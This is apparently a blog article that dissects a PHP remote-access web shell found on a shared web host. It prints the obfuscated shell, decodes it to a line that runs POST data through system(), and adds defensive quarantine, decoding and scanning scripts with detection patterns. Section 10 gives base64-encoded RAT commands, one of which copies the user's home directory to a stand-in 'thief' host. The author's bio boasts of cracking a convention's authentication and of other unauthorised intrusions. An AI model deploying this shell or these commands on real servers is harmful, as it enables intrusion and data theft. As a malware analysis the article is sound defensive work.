How does a server-side virus work? (RAT)

Q: Have you ever been tempted to look into a computer virus, but were too afraid to proceed in fear of an uncontrolled infection?
A: We did. And this is what we found. Not a Virus. A Rat.
Sensitive reader Advisory:
This article goes into the details of a server-side RAT infestation, and will end with the dissection of said RAT. At the end, you will even be given the opportunity to TRY THE RAT yourself! (in the confined safety of our lab, of course)
1. Facts…
- Viruses will infect your server (no matter how well protected you are).
- If your server is online, you are at risk.
- Viruses used to be silly malicious software that could damage your computer. Viruses are now clever malicious meanware that will hurt you and others on a large scale.
- Knowledge is power. If you know what is coming your way, you may be able to deflect the attack.
2. Reality Check
- You (the honest website builder) only have the available tools to protect yourself. We will call that the shield. They (the malicious hackers) are well aware of the shields you use: their strength, limitations, pitfalls and even bugs. They constantly use smarter, more advanced, distributed technology. Yes, eventually, a better sword will pierce your shield.
- If you are the IT manager of a Fortune 500 company, bother reading this article not. You already know what I am talking about, and the funds you ditch yearly in security exceed my lifetime salary several times over. For the rest of us, who host our sites on one of the well known providers, it is a different story. Infections cross user accounts and enter by routes against which we, the host's customers, have no defense.
- Viruses plaguing servers have various intentions, generally stealing processor time, server’s bandwidth, server’s content, and, well, money.
- Know how to identify a server virus. This is what this article is about.
3. What’s a RAT? (R.A.T.)
RAT stands for Remote Administration Tool.
It is a virus that knows no account limit, no time limit, no power limit. It is an incredibly small file, with incredibly little intelligence. Let me compare 3 classes of viruses to clarify that statement:
- An old school Trojan is a malicious software which you would install yourself on your machine. It presents itself as a sheep, while it is a wolf. Once you run it, all hell breaks loose. Because you would install it yourself, a Trojan can be a rather large piece of software. You generally would know right away you are infected, only too late.
- A traditional Virus is a small software which tucks itself inside another, otherwise harmless software. Hence the name Virus, which implies infecting larger applications (and hiding there), self replicating capabilities, and of course some malicious objective and often disastrous side effects.
- A RAT is even smaller than a Virus. Think of it as an inert piece of DNA. It knows nothing, does nothing, can’t reproduce itself on its own. A RAT by itself is harmless. Launch it and nothing happens. Delete it and no harm is done.
4. Why is a RAT dangerous?
A RAT gives total control, I repeat, total control of your computer (i.e. the server) to another computer, remotely. That remote computer may be located on Mars for all I know, and it can reproduce like rabbits, install new software, de-activate your virus protection software, delete files, snoop around, trace your activities, read all your information, etc.
Quick, think about something your server can do.
Yes, a RAT can do that too. And using your account credentials while it’s at it.
5. Will a RAT disable my computer?
Unlikely. The strength of a RAT is its stealth mode of operation. Removing files, compromising your server's mode of operation, or being discovered is probably the last thing a RAT will do. That would be a suicidal RAT, but in order to disable a system on a large scale, this is entirely conceivable.
Few secret agents wear the official secret agent outfit (dark glasses, cool hat, long coat, and newspaper to hide behind). A RAT is no exception.
6. Will a RAT make unauthorized use of my server?
Likely. And of others, too. It will send spam, trace transactions, and multiply discreetly. The more RATs around, the harder they are to eradicate.
7. Can I protect myself against a RAT?
If you host your own domain on your own system, possibly. This is beyond the scope of this article.
If you use an external host on a shared computer, this responsibility is shared between you and that host. Your responsibility is to keep your directories non writable when possible, and report suspect files, while the host’s responsibility is to take immediate action if an infection occurs.
Do not rely on that statement! The reason I am writing this article in the first place is that a national provider has been infected, and while we gave said host all information about the infection, their response was to change our FTP password, randomly, once a week.
Let me make that clear. Bleeding a patient rarely improves a fever.
8. What to do when infected?
- rename the suspicious file right away. Do not delete it! If that file was not a RAT, you may permanently damage your own server! Renaming it will give you a chance to reactivate the offending file, if it was not a RAT after all.
- Remove its executable permission. A native server RAT is executable by definition, so this may be a valid method. Know that this may not be enough.
- Move it to a different directory. Chances are the remote computer won’t find it, at least not right away.
- ZIP it! A compressed RAT (or Virus, or Trojan) is, by definition, disabled.
- Send that ZIP file to us for analysis! (dev@thegothicparty.com). Time permitting, we will look at it and suggest appropriate action.
I recommend renaming a potential RAT as your first line of defense.
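As an added example (not code from the original article), here is the procedure of this section as a script: it records a SHA-256 of the untouched file for the report, renames the file, strips its execute bits, moves it out of the web root and zips it, never deleting anything. The directory names and the harmless stand-in file it creates for the demonstration are assumptions, as is the ".suspect" suffix.

```python
import hashlib
import shutil
import stat
import tempfile
import zipfile
from pathlib import Path


def quarantine_suspect(path: str, quarantine_dir: str) -> dict:
    """Apply the steps above to one suspect file, without deleting it.

    Order follows the article: rename first, then drop the execute bits,
    then move the file out of the web root, then zip it for analysis.
    A SHA-256 of the untouched file is recorded first so the report to
    the host (or to an analyst) identifies exactly what was found.
    """
    src = Path(path)
    qdir = Path(quarantine_dir)
    qdir.mkdir(parents=True, exist_ok=True)

    sha256 = hashlib.sha256(src.read_bytes()).hexdigest()

    # 1. rename in place: with a ".suspect" suffix (an assumed convention)
    #    the web server no longer treats it as a PHP script, and the
    #    original name stays recoverable if it was not a RAT after all
    renamed = src.with_name(src.name + ".suspect")
    src.rename(renamed)

    # 2. strip every execute bit; keep read/write for the owner only
    renamed.chmod(stat.S_IRUSR | stat.S_IWUSR)

    # 3. move it out of the web root (shutil.move also works across filesystems)
    moved = Path(shutil.move(str(renamed), str(qdir / renamed.name)))

    # 4. zip it: the archive is inert and is what gets sent for analysis
    archive = qdir / (src.name + ".zip")
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(moved, arcname=moved.name)

    return {
        "original": str(src),
        "sha256": sha256,
        "quarantined": str(moved),
        "archive": str(archive),
    }


def demo() -> dict:
    """Run the procedure on a constructed stand-in file (not the real RAT)
    inside a temporary directory and return what a caller can check."""
    work = Path(tempfile.mkdtemp())
    webroot = work / "public_html"
    webroot.mkdir()
    suspect = webroot / "googlecalendar.php"      # file name taken from the article
    suspect.write_text('<?php echo "constructed placeholder"; ?>\n')  # harmless stand-in
    suspect.chmod(0o755)                          # executable, as a live RAT would be

    report = quarantine_suspect(str(suspect), str(work / "quarantine"))

    quarantined = Path(report["quarantined"])
    report["original_gone"] = not suspect.exists()
    report["exec_bits"] = quarantined.stat().st_mode & 0o111
    with zipfile.ZipFile(report["archive"]) as zf:
        report["archive_names"] = zf.namelist()
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run as a script it prints the report for the stand-in file. Note that a .php file is executed by the web server whenever it is requested, whatever its execute bit says, so step 2 alone does not take a PHP RAT out of service; the rename and the move are what stop it from being served.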
9. A RAT dissection
I will spare you the gory details. Here is a step-by-step analysis of the remote access tool that infected <name withheld> national provider mentioned above.
9.1. File specifics
- Original virus name, as stored on the server:
googlecalendar.php
We had never installed googlecalendar in that well controlled environment, so the presence of that file was rather suspicious.
- Original virus content, when opened with a text editor:
<?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW09c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQsc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbigkX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(base64_decode($l)); ?>
9.2. aWYoJF9QT1N… etc. what? English please.
Substituting “obfuscated” for that evidently obfuscated stream of 276 characters, and adding some formatting and some comments:
<?php // Execute the following PHP script
$X=basename(__FILE__); // Store where we're at into $X
$l="obfuscated"; // Put some {magic} into $l
eval( // execute the {magic}
base64_decode($l) // decode "obfuscated"
);
?>
The eval command is the danger here, and replacing eval by echo and merely executing the PHP script transforms “obfuscated” into this dangerous algorithm:
if($_POST["link"]){$sum=substr($_POST["link"], strlen($_POST["link"])-4,strlen($_POST["link"])-1); if($sum="1jX"){$link=base64_decode(substr($_POST["link"], 0, strlen($_POST["link"])-4)); @system($link);}}
Almost there!
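Replacing eval by echo means running the attacker's PHP, one typo away from executing it. As an added example, not part of the original article, the following Python recovers the payload statically, with no PHP interpreter involved. It goes a little beyond the sample: it also peels nested eval(base64_decode) layers, which this RAT does not use but later droppers often do, and it lists which command-execution functions the recovered code calls. The sample is the infected file from section 9.1, copied with the spaces that line-wrapping inserted into the literal; the regular expressions and function names are this example's own.

```python
import base64
import re
from typing import List, Optional

# A PHP string literal assigned to a variable, e.g.  $l="aWYoJF9Q...";
# Whitespace is allowed inside the literal because copied samples are
# often line-wrapped, as the one in section 9.1 is.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*;')

# eval(base64_decode($var))  or  eval(base64_decode("literal"))
EVAL_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*'
    r'(?:\$(\w+)|["\']([A-Za-z0-9+/=\s]+)["\'])\s*\)\s*\)'
)

# Functions in a recovered payload that hand data to the operating system
EXEC_RE = re.compile(r'\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(')


def decode_layer(source: str) -> Optional[str]:
    """Return the PHP hidden behind one eval(base64_decode(...)) layer,
    or None when the source has no such layer."""
    match = EVAL_RE.search(source)
    if match is None:
        return None
    var, literal = match.groups()
    if literal is None:
        # the argument was a variable: look up the literal assigned to it
        literal = dict(ASSIGN_RE.findall(source)).get(var)
        if literal is None:
            return None
    encoded = re.sub(r"\s+", "", literal)          # undo line-wrapping
    decoded = base64.b64decode(encoded, validate=True)
    return decoded.decode("utf-8", errors="replace")


def unwrap(source: str, max_layers: int = 10) -> List[str]:
    """Peel eval(base64_decode) layers until none is left. Real droppers
    often nest several; max_layers stops a pathological input."""
    layers: List[str] = []
    current = source
    for _ in range(max_layers):
        inner = decode_layer(current)
        if inner is None:
            break
        layers.append(inner)
        current = inner
    return layers


def command_sinks(php: str) -> List[str]:
    """Names of command-execution functions called in a recovered payload."""
    return sorted(set(EXEC_RE.findall(php)))


# The infected file from section 9.1, copied as it appears on the page
# (including the spaces that line-wrapping inserted into the literal).
SAMPLE = (
    '<?php $X=basename(__FILE__); '
    '$l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW0 9c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQ '
    'sc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms '
    '9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbig '
    'kX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; '
    'eval(base64_decode($l)); ?>'
)


if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE), 1):
        print(f"--- layer {depth} ---")
        print(layer)
        print("command sinks:", command_sinks(layer))
```

For this sample the script prints exactly the one-line algorithm shown above and reports system as the only command sink. It only understands the eval(base64_decode(...)) shape; a payload wrapped in gzinflate, str_rot13 or string concatenation needs an extra decoding step before the same loop applies.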
9.3. Here is the formatted source code…
Reverse-engineered by our good people at the lab, conveniently indented and commented, it turns out to be a well written piece of code, which will execute without flaws. Dynamic commands can be generated remotely, executed by the RAT, and the results sent back to the originating organization.
if( $_POST["link"]) { // Read the "link" parameter from the POST body.
    // ($_POST holds form-encoded request bodies, so the value does
    // not travel in the URL.) In this RAT, a request looks like this:
    // POST {yourserver}/googlecalendar.php   with body   link={magic}
    $sum=substr( $_POST["link"],
                 strlen($_POST["link"])-4,
                 strlen($_POST["link"])-1);
    // extract a signature from {magic}: the start offset is
    // strlen-4, so $sum holds the last 4 characters of {magic}
    if( $sum="1jX") {
        // Intended as a check that the signature matches the
        // hardcoded value "1jX". Note that a single "=" is an
        // assignment in PHP, not a comparison, so this condition
        // is always true and the signature is never verified.
        $link=base64_decode( substr($_POST["link"],
                                    0,
                                    strlen($_POST["link"])-4));
        // convert {magic} (minus the signature) into a command,
        // using MIME base64. There is no further verification
        // that this command is valid.
        @system($link);
        // use @ to suppress errors and warnings, and
        // order the system to execute the command!
    }
}
9.4. How to find this virus on your system?
[~] grep -r "base64_decode" .
RAT – Dead.
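The grep above reports every file that mentions base64_decode, legitimate uses included (decoding an embedded image, for instance), and you still have to read each hit. As an added example, not from the article, here is a scanner that looks instead for the behaviours seen in the dissected RAT: eval of a decoded string, request data handed straight to a command function, error-suppressed command execution, and unusually long base64 literals. The sample tree it builds is constructed for the demonstration; the googlecalendar.php it writes has the same shape as the infected file but its literal only encodes a harmless echo. The rule names, file suffix list and the 120-character threshold are this example's own choices.

```python
import base64
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Each rule is (reason, pattern). They target how a RAT behaves, not the
# mere presence of base64_decode, which plenty of legitimate code uses.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("eval of a decoded string",
     re.compile(r'\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)),
    ("request data passed straight to a command function",
     re.compile(r'\b(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I)),
    ("error-suppressed command execution",
     re.compile(r'@\s*(?:system|exec|passthru|shell_exec)\s*\(', re.I)),
    ("long base64-looking literal",
     re.compile(r'["\'][A-Za-z0-9+/]{120,}={0,2}["\']')),
]

PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def scan_text(text: str) -> List[Tuple[int, str]]:
    """Return (line number, reason) for every rule hit in a piece of PHP."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for reason, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, reason))
    return hits


def scan_tree(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Walk a web root and report only files with at least one hit,
    keyed by path relative to the root."""
    root_path = Path(root)
    findings = {}
    for path in sorted(root_path.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root_path).as_posix()] = hits
    return findings


def build_sample_tree() -> str:
    """Constructed sample files (not the real infection) in a temp dir."""
    root = Path(tempfile.mkdtemp())
    (root / "public_html").mkdir()
    # 1. same shape as the infected file from section 9.1, but the
    #    literal only encodes a harmless echo, so nothing bad is stored
    harmless = base64.b64encode(b'echo "constructed sample";').decode()
    (root / "public_html" / "googlecalendar.php").write_text(
        f'<?php $X=basename(__FILE__); $l="{harmless}"; eval(base64_decode($l)); ?>\n')
    # 2. a legitimate base64_decode: grep -r "base64_decode" reports it, the rules do not
    (root / "public_html" / "logo.php").write_text(
        '<?php\nheader("Content-Type: image/png");\necho base64_decode($encodedLogo);\n')
    # 3. an ordinary page
    (root / "public_html" / "index.php").write_text('<?php echo "hello"; ?>\n')
    return str(root)


def demo() -> Dict[str, List[Tuple[int, str]]]:
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for rel, hits in demo().items():
        for lineno, reason in hits:
            print(f"{rel}:{lineno}: {reason}")
```

Only googlecalendar.php is reported; logo.php, which a bare grep would also list, is passed over. The rules are deliberately narrow and line-based, so code split across lines or built with string concatenation slips through; treat a clean run as one input to the review, not as a clean bill of health.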
10. Experiment with the RAT
Disclaimer: The RAT you are about to try is, well, in a coma. It will analyze the parameters you are sending, and stop short of executing the command. The result will be displayed in a new window. Neither you nor the server hosting thegothicparty.com is at risk.
10.1. Here are some RAT commands ready to try:
- bHMgLWFs1jx=
(List the content of the current directory)
- Y2htb2QgIHggZmlsZQ==1jx=
(Make a file executable, so it can be run)
- c2NwIC1yIH4gdGhpZWZAc29tZS5sb2NhdGlvbi5vbi5tYXJz1jx=
(Copy the entire user directory to a remote location)
10.2. Create your own RAT commands and try them out!
Use this URL to take a Linux command, encode it in base64, add the password, and then feed the result to the RAT!
- Substitute {your-command} by, well, your command.
http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/base64.php?raw={your-command}
- Now that you have an encoded command, use it to invoke the RAT
http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/rat.php?link={encoded-command}
If you succeed, you will get to a page that says “@system(do-something-horrible)”, which in the original RAT could have had disastrous effects. Good thing you are in the lab!
This makes you a hacker, I think…
11. About the Author
I have written shield and swords for as long as I have been developing software. In reverse order, here are some interesting swords:
- Cracked some authentication method used by <name withheld> convention, and came out with about 70 free passes overnight. Paid full price for the entry fee, then re-entered <name withheld> convention with one of the free codes, and proceeded to distribute my resume to security companies in order to land a job as a legal hacker, finding cracks in their system in order to improve it. Some simply kicked me out of their stand, some were both intimidated and scared, and no-one called me back.
- Cracked the user’s password for <name withheld> who had lost access to his online service information. Connected a computer to his network, made my computer act as a host (which his computer blindly trusted), led his software to think it was communicating with a distant server.
- Cracked the administrative password for <name withheld>, an accounting software, while the company’s accountant had been fired and was nowhere to be found. Created 2 fresh installations of said software, with 2 carefully chosen sets of data, and diff’ed the two. The password was the name of his girlfriend, and the company that ordered the work never paid as promised.
- Cracked some other <name withheld> applications which are too sensitive to reveal here.
And here is a list of the most famous shields I wrote:
- <name withheld>
- <name withheld>
- etc.
